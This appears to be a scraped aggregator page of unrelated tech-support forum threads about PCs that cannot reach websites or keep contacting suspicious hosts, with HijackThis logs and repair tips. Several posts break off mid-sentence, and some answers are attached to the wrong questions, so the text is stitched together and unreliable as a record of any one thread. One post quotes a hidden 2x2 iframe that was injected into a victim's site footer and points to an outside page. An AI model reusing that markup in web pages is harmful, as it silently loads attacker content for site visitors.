HEU_AEGIS, computer keeps trying to reach a suspicious site

Q: HEU_AEGIS, computer keeps trying to reach a suspicious site

Hi guys!!  Boy, I hope you can help me because I am about to pull my hair out over this one.
I think I got infected with some virus called HEU_AEGIS_HttpDownloader blah blah a month back.  I think this because it came up in my AV (Trend Micro Titanium Maximum Security).  The AV did its thing and I guess cleaned the virus or removed it.  It no longer shows up.  During this time, I also received about a dozen other warnings about a suspicious file which Trend deleted whenever it showed up.  It was always found at: C:\Documents and Settings\Owner\Local Settings\Temp\***.tmp.exe (the *** would always be some random letters and numbers).  This virus and ***.tmp.exe file no longer show up.  However...
Since that virus popped up (and these two things may not be related) I keep getting a web threat listed in Trend Micro which shows a web threat which happens about twice every hour.  It says it 'blocked' a web threat to website address 176.9.##.###/ip.php
I have checked my services, msconfig start up settings, registry, and even a complete search on my hard drive for that IP (which I partially masked on purpose).  Nothing can find it.
I tried running full scans of Trend Micro Titanium Maximum Security, Ad Aware, MalwareBytes, and Super AntiMalware.  All of them say my machine is clean.
I even tried using my earliest system restore point, and that did not rid me of these constant web threats.
There has to be something automated and running on my machine that tries to hit that website every thirty minutes, but how can I tell what it is - and how to put an end to it???
Here is a copy of my HijackThis log.  For all that is good and holy, and for my last ounce of sanity, please, please help me.
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 9:07:13 PM, on 6/24/2014
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal
Running processes:
C:\Program Files\Creative\Shared Files\CTAudSvc.exe
C:\Program Files\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Trend Micro\UniClient\UiFrmWrk\uiWatchDog.exe
C:\Program Files\Trend Micro\AMSP\coreFrameworkHost.exe
C:\Program Files\Trend Micro\UniClient\UiFrmWrk\uiSeAgnt.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\Program Files\LeapFrog\LeapFrog Connect\CommandService.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files\Trend Micro\HiJackThis\HiJackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R3 - URLSearchHook: (no name) - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - (no file)
O2 - BHO: Trend Micro NSC BHO - {1CA1377B-DC1D-4A52-9585-6E06050FAC53} - C:\Program Files\Trend Micro\AMSP\module\20004\3.0.1313\6.8.1120\TmIEPlg.dll
O2 - BHO: Trend Micro Toolbar BHO - {43C6D902-A1C5-45c9-91F6-FD9E90337E18} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll
O2 - BHO: Java™ Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O2 - BHO: TmBpIeBHO - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files\Trend Micro\AMSP\module\20002\8.0.1170\8.0.1170\TmBpIe32.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O3 - Toolbar: Trend Micro Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll
O4 - HKLM\..\Run: [CTxfiHlp] CTXFIHLP.EXE
O4 - HKLM\..\Run: [EPSON Stylus C88 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIABA.EXE /P23 "EPSON Stylus C88 Series" /O6 "USB001" /M "Stylus C88"
O4 - HKLM\..\Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
O4 - HKLM\..\Run: [CanonSolutionMenuEx] C:\Program Files\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
O4 - HKLM\..\Run: [IJNetworkScannerSelectorEX] C:\Program Files\Canon\IJ Network Scanner Selector EX\CNMNSST.exe /FORCE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RunDLL32.exe NvMCTray.dll,NvTaskbarInit -login
O4 - HKLM\..\Run: [nwiz] C:\Program Files\NVIDIA Corporation\nview\nwiz.exe /installquiet
O4 - HKLM\..\Run: [Trend Micro BTC] "C:\Program Files\Trend Micro\Titanium\plugin\TMDC\TMDC.exe" -btc
O4 - HKLM\..\Run: [Trend Micro Client Framework] "C:\Program Files\Trend Micro\UniClient\UiFrmWrk\UIWatchDog.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [OE] C:\Program Files\Trend Micro\Internet Security\TMAS_OE\TMAS_OEMon.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [OE] C:\Program Files\Trend Micro\Internet Security\TMAS_OE\TMAS_OEMon.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: Garmin Communicator Plug-In - https://static.garmincdn.com/gcp/ie/
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1341604563412
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O18 - Protocol: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\8.0.1170\8.0.1170\TmBpIe32.dll
O18 - Protocol: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\module\20004\3.0.1313\6.8.1120\TmIEPlg.dll
O18 - Protocol: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll
O18 - Protocol: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\UIFramework\ProToolbarIMRatingActiveX.dll
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: SAS Core Service (!SASCORE) - SUPERAntiSpyware.com - C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
O23 - Service: Trend Micro Solution Platform (Amsp) - Trend Micro Inc. - C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Creative Audio Engine Licensing Service - Creative Labs - C:\Program Files\Common Files\Creative Labs Shared\Service\CTAELicensing.exe
O23 - Service: Creative Audio Service (CTAudSvcService) - Creative Technology Ltd - C:\Program Files\Creative\Shared Files\CTAudSvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Oracle Corporation - C:\Program Files\Java\jre7\bin\jqs.exe
O23 - Service: Ad-Aware Service 11 (LavasoftAdAwareService11) - Unknown owner - C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe
O23 - Service: LeapFrog Connect Device Service - LeapFrog Enterprises, Inc. - C:\Program Files\LeapFrog\LeapFrog Connect\CommandService.exe
O23 - Service: NVIDIA Network Service (NvNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Security Activity Dashboard Service - Unknown owner - C:\Program Files\Trend Micro\TrendSecure\SecurityActivityDashboard\tmarsvc.exe (file missing)
End of file - 8494 bytes


A: HEU_AEGIS, computer keeps trying to reach a suspicious site

I believe I found the cause of this issue.  A rootkit was hiding itself pretty well.  Malwarebytes, SuperAntiSpyware, Trend Micro Titanium, and Ad Aware could not find it.  I finally tried Kaspersky's TDSSKiller and it found and deleted an .exe file and registry entry it said was a high risk.  Since it removed the file, I have had no web threats in the past 24 hours.
Here is the text of the infected file TDSSKiller reported and removed:
File: C:\Document and Settings\Owner\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\winhlp32.exe
Malware object, high risk
If anyone else is experiencing a constant barrage of web threats being blocked and can't find the cause, be sure to try TDSSKiller.

Hello everyone,
I hope you are well.
I was able to find the problem in my site with the help of dear cchamberland.
It is an iframe injection at the bottom of my pages, in index.php, footer.php, etc.
Then I removed the iframe, and I also applied some other security to the site.
< iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://highperformancetraining.org/chhd.html?i=1526587 >< /iframe >
But now, after 1 day, my site was infected again with the same iframe.
I really do not know what I should do.
Is there anyone who can help me?
My site is www.pasak.org
Pasak Sh

A: problem in my site, google alarm that my site is Suspicious

Hi,

Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.

Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.

The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.

Thanks

This is bizarre.

I'm trying to persuade my browser to connect with www.piratour.net. It times out and fails to find it.

I try on my phone using the home wi-fi - same result.

I switch off my phone wi-fi and try with data. Success!

This happens on the PC with both Firefox and Edge.

I open a command window and try ping www.piratour.net. Nothing, however the screen tells me immediately that the ip address is .

I have spent quality time with my ISP (Plusnet in the UK). The man tried that address from his own machine - no success.

I have tried changing the DNS servers (my idea). No luck.

The fact that the service guy also couldn't reach it suggests that the problem is somewhere way outside my setup.

I would appreciate any thoughts.

Tech Support Guy System Info Utility version
OS Version: Microsoft Windows 10 Home, 64 bit
Processor: Intel(R) Celeron(R) CPU J3060 @ 1.60GHz, Intel64 Family 6 Model 76 Stepping 4
Processor Count: 2
RAM: 3941 Mb
Graphics Card: Intel(R) HD Graphics, 1024 Mb
Hard Drives: C: 149 GB (85 GB Free); D: 780 GB (663 GB Free);
Antivirus: Windows Defender, Enabled and Updated

For some reason, I am unable to reach Ann Coulter - Official Home Page on my computer. It's been several weeks since I was last able to visit the site. The problem happens in every browser I have, including recent or current versions of Firefox, IE, Opera and Chrome. I can reach any other website I try to get to just fine. I never used to have any trouble reaching that website until about a month ago. No one else uses this computer and I live alone.

It appears that I've blocked that one site but I'm darned if I can figure out how.

Here's what I've tried so far:
1. Run Avast Free Antivirus with the latest version of the program and definitions. Results: no threats found with either the quick scan or the full scan.
2. Run Malware Bytes with the latest definitions. Results: two threats found and removed but I still can't reach the Coulter website.
3. Checked my Hosts file. Results: nothing there is blocking any website.
4. Checked my router settings. Can't see any blocks there.
5. Had other people try to access the site; they were successful.
6. Googled and found one other forum where someone was having the same problem with respect to the Coulter website. But his problem apparently went away two weeks ago. He didn't indicate if he had done anything to make it go away.
7. Checked the Windows Event logs but can't see anything there reflecting my problem.

Can anyone suggest anything else I can check?

I can live without this website working but it's bugging me tha...

A:Can't reach one site

Since it's happening in all browsers, my guess is it's blocked in your modem/router. Any liberals been around? lol

I'm trying to reach a friend's FTP site and can't get any connection/response.

Direct FTP attempt: The operation "times out".
Pinging his IP address from CMD prompt: All attempts time out.
Tracert to his IP: It begins the trace process, but loses the route after about 4 hops.

I have placed his IP address in the excluded (allowed) sites in my firewall settings. I can't figure out what else may be preventing my connection. Any help?

Dave Danger

XP Pro SP2, Asus A7N8X-X MoBo, AMD Athlon XP at 1837.5 MHz.
512 MB DDR-SDRam.
Symantec Internet Security, AVG Free 7.0.308, SpySubtract/Adsubtract, NoAdware, Ad-Aware SE Personal

A:Solved: Can't reach an FTP site

I bought my Elite X2 on 24th Dec 2016.  I checked my warranty through ' http://h20566.www2.hp.com/hpsc/wc/public/home '.  Since the warranty is not correct, I have attempted to dispute the warranty through ' http://support.hp.com/us-en/checkwarranty?openCLC=true ', but I could not check my warranty through this site.  I wonder how I open a warranty dispute?

I have a Win XP SP3 desktop PC that developed a problem reaching search engine sites.
I have cleared out viruses and malware using various apps including MWB and other security software.
Had a problem with Bing but seems to be clear now, but still won't reach any www.google sites. Does reach google sites with prefix, such as maps.google, etc. but none of the www.google sites.
In accordance with your instructions I have run diagnostics and attach logs dds.txt and attach.zip
Also attached report from minitoolbox.
I hope you may have an answer up your sleeve.
Many thanks for any assistance.
Kind regards

A:Cannot reach any www.google site

Hello qpager,

I would like to welcome you to the Malware Removal section of the forum. Around here they call me Gringo and I will be glad to help you with your malware problems.

Very Important --> Please read this post completely, I have spent my time to put together some things for you to keep in mind while I am helping you to make things go easier, faster and smoother for both of us!

Please do not run any tools unless instructed to do so. We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.

Please do not attach logs or use code boxes, just copy and paste the text. Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.

Please read every post completely before doing anything. Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.

Please provide feedback about your experience as we go. A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", ...

To use some features on the Nascar.com web site, you need to log in through https://secure.audience.nascar.com. Problem is, the site can't be reached or pinged. Increasing ping time generates nothing but timeout errors. Something in the computer is blocking it from reaching that web address, whether it's entered as a name or a numeric address. This problem happens with four different web browsers - IE8, Firefox 3, Chrome and Safari.

It's a Gateway laptop with Vista SP1. It happens with a LAN connection. WiFi and Ev-Do. The web address is available on one machine with an identical WiFi link but not with the Gateway laptop.

Here are some of the attempts to solve the problem that have failed:

Resetting TCP/IP stack.
Switching DNS server.
Removing Norton Internet Security 2008.
Shutting down Windows Defender.
Running the computer with no firewall.
Removing and reinstalling network adapters and reinstalling drivers.
Running Vista in safe mode with networking.
Removing all temporary files and history.
Adding the domain to the IE trusted sites list.

The secure.audience.nascar.com address and the nascar.com domain are not blocked in the Hosts list.

NASCAR tech support has no idea what's going on.
Several checks of other web sites and Microsoft's online support on problems with accessing https secure sites have turned up no problems with accessing that site.

The Gateway has no trouble accessing several other https secure sites, but can not reach secure.a...

A:Can't reach a https secure site


Using three different computers 1 Win 7, 2 Win 10 and one android phone.
On the Windows 7 machine I cannot reach one web site (SanduskyRotaryPizzaChallenge.com), I get 503 server unavailable. All other web sites work fine on the Win 7 machine. Using Chrome, IE and Edge.
On the Win 10 and Android the web site works fine.
Only the one web site on only the one computer does it not work.
Using FileZilla I can FTP into the site, on ALL computers.
So what should I be looking at on the Win 7 machine? Remember all other sites work fine.

I am using a NetGear RP614 v1 router to share a cable network connection to the Internet. We need to connect to the web site of our local school system, (ip = We cannot see any pages from this domain if the router is connected, however everything is OK if we connect any of our computers to the cable modem. The router is not set up to block any sites. I have reduced the maximum packet size from 1500 to 1400 to 1300 bytes, but no change in connectivity has happened. Any ideas where to look?
The DNS servers listed by the router are correct, and I still cannot connect if I enter the IP address rather than the URL.

There are computers on the lan running Win 95, Win98, WinXP and all see the same thing. We are using a Motorola SurfBoard SB5100.

A:Can't reach a known good web site when using router.

You can not access your own IP, if that is the IP-number in your router.
Just use http://www.forsyth.k12.ga.us/ and all should be fine.


It happens on all browsers on every computer in the house. I am running NIS 2012 and can't find if/where that is causing the problem. It may be my ISP but how would I know? Any advice is welcome. Thank you.

A:Can't reach Newegg consistently and I know their site is up

Newegg.com is working for me now but there are times it doesn't. A couple weeks ago I couldn't get to them.

Hi, I have known a problem lately about some malware that won't let you get to any of Microsoft's sites or antimalware sites - by scanning my computer found some 01.tmp, 02.tmp files - the files are being deleted by Malwarebytes at startup but spawn alive again every time.

I was looking for help at this forum - found some topics about the issue, but couldn't find any answer. So I went to war alone, and won... (after too many hours - about 6)

Anyway, I'm new around here and probably won't last long, so this is kind of an advice for whomever has this malware problem or for the administrators of the forum trying to help others:

The little $!#!#! is poisoning the DNS cache - that's why you can't get to any site even if you're editing your hosts file.

So what you should do is:
1. Open CMD.EXE.
2. Type in the command line: TASKLIST /SVC - this will list all processes currently running with the services in the background.
3. Look for a process "svchost.exe" with the service "Dnscache".
4. Open Task Manager, and if you still don't have the "PID" column, go to "VIEW", "SELECT COLUMNS" and add it.
5. Kill the svchost process that is running the DNS cache by comparing the PIDs from the CMD to those in the Task Manager.
6. Now you can access sites freely: the Microsoft Malicious Removal Tool will find it for you and also COMODO free antivirus.
7. NOTICE that until the malware is wiped out you should do steps 1-5 every time your computer is ...

A: Can't reach microsoft's site and antimalware sites - 01.tmp file

You can simply stop and restart the DNS Service using these commands:
NET STOP DNSCache
NET START DNSCache
You can save these lines in a file with extension .CMD and when you need to run it, just double click on the file.

I keep getting pops from MalwareBytes that they have blocked a malicious site. The weird thing is - it's OUTBOUND!! I have no idea why this is happening or how to stop it. The pop up window says the site is "stats.traffiliate.com" - IP - and a port number that keeps changing. Today the first port was 61276, then it was 61681, then 61866 - then I stopped recording the port. It also shows what program is trying to do this, but I can't get the whole path - this is all I can see:

C:/Program Files (X86)/Goo....ome/Application/Chrome.exe

So I'm sure it's something with Chrome, but how do I stop it. I'm happy it's blocking malicious stuff, but this is starting to drive me crazy. I've never had anything like this before. It's only been happening the last 10-12 days. I've run all the clean up programs I can have including, Ccleaner, Disk Cleanup, TFC, and defragged, but nothing has stopped it.

I think there have been times when it showed other sites it was blocking, but this one is the most consistent and I figure if I can learn how to stop it, I can get rid of any others that might pop up.

As always - thanks for all your help.

Running a MAC OS X using Parallels to run Vista. So in Vista I am using WordPress to do a web site hosted by Dreamhost when I discovered that when I went to my domain using Mozilla I get redirected to a suspicious site "targetedinfo.com" I changed my FTP password for word press and even deleted the domain from dreamhost to insure that wordpress was removed from my site which I suspected was the problem. I used Mozilla to install WordPress. I went to my site host and put up web site under construction which is what is seen from any computer except mine.

When I visit my domain from the infected computer using Mozilla I get redirected, when I use IE I do not get redirected. To make matters worse when I use Mozilla or Safari from the MAC OS X I get redirected.

Need help!

Logfile of HijackThis v1.99.1
Scan saved at 9:57:15 PM, on 28/06/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Mozilla Firefox\firefox.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.03.0000.1005\en-xu\stmain.dll
O2 - BHO: MSNToolBandBHO - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\MSN Toolbar\01.02.5000.1021\en-ca\msntb.dll
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: EPSON Web-To-Page - {EE5D27...

A:i entered suspicious site is my hjt log clean?


I was on facebook and was scrolling through my news feed when I saw something saying "I can't believe a girl did this because of Justin Beiber" with the URL. Being that I disliked the guy anyway, I was curious and bored.

(click at your own risk since I do not know if it is malicious or not, but i do not recognize the domain link .info): justinbgirl.info

there was another URL when i entered it in the search field on Facebook: crazyjustin.info as part of a second post relating to it.

When I stupidly clicked on the link of the first one, it took me to a page (i took a screenshot in the attached file). I couldn't navigate anywhere and seemed like nothing happened. No antivirus alerts, nothing out of the ordinary. My laptop did not act up or anything either. I checked my task manager for suspicious programs but nothing registered as anything malicious.

I scanned my laptop and my scanner found nothing.

Now I am worried I am infected with spyware and I have no clue where to turn to or what to do to check to see if I even have it in the first place.

A:Suspicious Site on Facebook...possible spyware/malware?

Stupidity is a very expensive luxury. Anyways, scan like there's no tomorrow. Use MBAM, SAS and the resident AV.

Don't access critical sites like your bank and cc, until you are certain the computer's clean. Watch out for weird behavior. Go to task manager and check for any suspicious names, google for them.

If you're paranoid or lazy, just restore windows from a previously created image, if there's one.

Some people would advise a reinstall, but that should only be the last resort.


Today i went to log into hotmail and the site was blocked by webroot saying suspicious site - i logged in because i know this site. The site blocked shows : http://by161w.bay161.mail.live.com/mail/logout.aspx or http://by161w.bay161.mail.live.com/?rru=home&livecom=1 - when i tried to logout. Once open, the face page looks normal but when i click on a message or options (to change password) the page goes blank and the address prefills with http://baymsg1020229.by2.gateway.edge.messenger.live ... or http://geo.messenger.services.live.com/xmlProxy.htm?vn=9.0905150&domain+live.com - something else suspicious is when i try to logout it appears I do - but when i click to normal log in site again - it automatically logs in (face page) without my having to enter my login/password - so i assume i cannot log out either! A few weeks back I would get the "suspicious site" msg fm webroot on the ads WITHIN hotmail and that resolved .. but this is entirely diff - i cannot do anything once i get into my site and i cannot log out properly - i am on windows xp 2002 live pack 3 - 64 bits - have webroot internet security complete and the last scan was done earlier today with only cookies detected. Am I hacked and what to do? Any help appreciated

In last couple day, comp start try 2 reach out from my comp out to random IPs (block by peerblock), go thru 1000s of ports from 1 internal IP. Only new thing install is bluestack android emulator. Also new 11-14 msft updates: "nov security monthly rollback..." and "win malicious soft remove tool - nov '17". I uninstall bluestack but ip attempt still continue.

Run scans: Norton AV, super antispyware, MBAM and spybot sd - all come back clean, no infect no rootkit, etc. Unfortunately no have restore pt (sys restore somehow turn off at some pt in past w/o my know?) to go back to.

Try 2 connect 2 following IPs thousands time/minute (but only when internet adapter turn on. when i turn off, attempt stop, dunno if important or obvious)


"ei du pont de nemours and co, inc"

"merit computer network"

I do no know if some soft is attempt 2 update, or if infection, or what. Try 2 google info about IPs but only find generic amazon info, no hint what this could be

DDS contents as request:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18838 BrowserJavaVersion: 11.151.2
Run by at 4:00:54 on 2017-11-16
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.1.1033.18.12279.7112 [GMT -8:00]
AV: Norton Security Suite *Disabled/Updated* {30744133-1E94-7B35-F4A3-82A5AEF1CBAA}
AV: Malwarebytes *Enabled/Updated* {23007AD3-69FE-687C-...

A:Computer keeps trying to reach several IPs

BUMP, please


I made a LAN of my PC and laptop using 1 additional network adapter in my PC and connecting them both with a CAT5 cross-over cable. I manually set the IPs in the network TCP/IP connection configuration, respectively for my PC and for my laptop.
The problem begins here - I can ping from PC to laptop and receive a response, connect to it and see shared folders/printers. But when I try to ping from laptop to PC, all I get is - Request timed out. Any other connection from laptop to PC is impossible also. Although in the Connection Status window, I can see how my PC receives the ping packets. Both computers' firewalls are off.

P.S. - can't explain this but - when I change ends of the cable between computers, my laptop's "ping -t" for PC gets responded 4 times and continues timing out after.

A:One computer can't reach other in LAN

when i change ends of cable between computers, my laptops "ping -t" for PC, gets responded 4 times and continues getting timing out after.

I applaud your trouble shooting. Most people never think of switching the cable like that.

The result makes the cable a top suspect.



Following complete failure of my touchscreen, the machine was taken away for repair just before the warranty expired, the touchscreen was replaced, but arrived back with damage inside the screen. Despite my efforts, I've not been able to get back in touch with anyone from HP. When I attempt to contact via website, after identifying my product it comes up with "page cannot be displayed" - I sent an email on December 17th and received no reply, a follow up email today came back undelivered due to the mailbox exceeding quota. I'm pulling my hair out!
HP Pavilion All-in-One - 23-q105na (Touch)
Model #: P1K69EA
Serial #: CZC5467J1K

As I said in the topic.

While I was using my external HDD, my computer froze and I restarted it.

After Windows started, I plugged the HDD in again but couldn't see it in 'My Computer'.

But I can (not can't) see it in My Computer (right click) > Manage > Disk Management and Control Panel > System > Device Manager > Storage Drivers (I don't know the exact word for it, because I use Turkish Windows).

And I can't do anything from these tools. I can't give it a drive letter, I can't recover or see it with recovery programs, I can't and I can't.

And I know it has nothing to do with the OS, and I need everything on this HDD.

Device: WD 3200BEV External USB Drive

And that's my problem, please help me out.

A:Cant reach my external HDD, but can see it from Computer Management and System

Describe the external drive and enclosure.

Parts List:
AMD CPU FX series
ASUS AMD Motherboard
1 SSD for Booting
2 Hard Disks for storage
GTX 970
750 W Power Supply

My problem is that I hit the power button on my computer it turns on but with fans at 20% and doesn't show anything on the screen, not even bios. I have already replaced the power supply and the motherboard thinking they were killed by a power surge but no luck. I wanted to consult people more knowledgeable than myself before I spend anymore money. Any advice would be great!

I have replaced the motherboard and power supply and tried changing ram and removing ram altogether. I also switched around my hard drives and ssd to try to get to BIOS.

Ok so here's what's going on: on one of my computers (Windows XP Home Professional I believe) I downloaded a pretty nasty virus by mistake and ran it (for some reason AVG didn't detect it as a virus). Well, this virus may just have totaled my hard drive beyond repair. I've researched on the web for people who have had it happen to them but found no easy answer. What happens is this:

1. I boot up computer
2. Computer gets all the way to loading bar
3. Quick Blue screen appears
4. BAM computer reboots endless cycle

Now I've made myself a winxp recovery cd (never had one in the first place) and have tried various commands to bring my computer to a working state to no avail

chkdsk and chkdsk /r return with something like "the system has unrecoverable errors"

bootcfg /rebuild returns with something about a problem with the file system and says to run chkdsk lol

I also tried a command to rebuild the boot.ini but it failed to...

I have been successful at getting windows PE to run by booting to cd drive

I tried chkdsk from there and still no good.

Safe mode returns the same results btw so thats out of the question.

ONE TIME I was able to start up windows in something like directory services mode but im not quite sure how :/ It just decided to show up on the menu with boot options on a try.

I've got like 40gigs of backed up data on there that I was *hoping* not to lose so this really pisses me off.

Also when I did get into windows that ONE time I sy...

A:Solved: Serious Problem: Computer Can't even reach login screen.

Computer turned off in the middle of windows update. Now computer can't get to homepage. Tried all F1-F11 options and received BSOD (Error code: 0x000000F4). Went to windows tech support and all of their tests point that it's an HP issue. If problem persists, BSOD indicated to disable/remove any newly installed hardware/software and to disable BIOS memory options such as caching or shadowing. Ran all available HP tests (Memory, hard disk, run-in, start-up, and battery). All passed except for battery (failure ID: 9C0c13-00089U-Xd6V5G-C0F603) and run-in (failure ID: 9C0C13-00089T-XD6V5G-C0CN03) tests and both failure id description for these two said, "Primary battery." Computer was working just fine before this issue. Please help.

Hello, I am trying to fix a computer for my company but I'm not sure what the issue is.
1. The computer is on, but has a blank screen. I held the power button to turn it off, waited 1 minute and started it back up. I got the "windows has been shut down improperly" screen. I told it to start up like normal and I see the Windows XP icon and the loading bar underneath. But then the screen goes black and the monitor just sits there on, with just black.
I'm thinking it may be that either the RAM card has an error or the motherboard itself is failing, but I'm not sure how to test these. Any and all help would be greatly appreciated.
Thank you
Windows XP Professional SP3
IBM  ThinkCentre
Pentium 4
Machine Type: 8187
Model : WLL
Product ID: 8187WLL

A:Computer starts up, but doesnt reach login screen.

Will it boot into Safe mode?

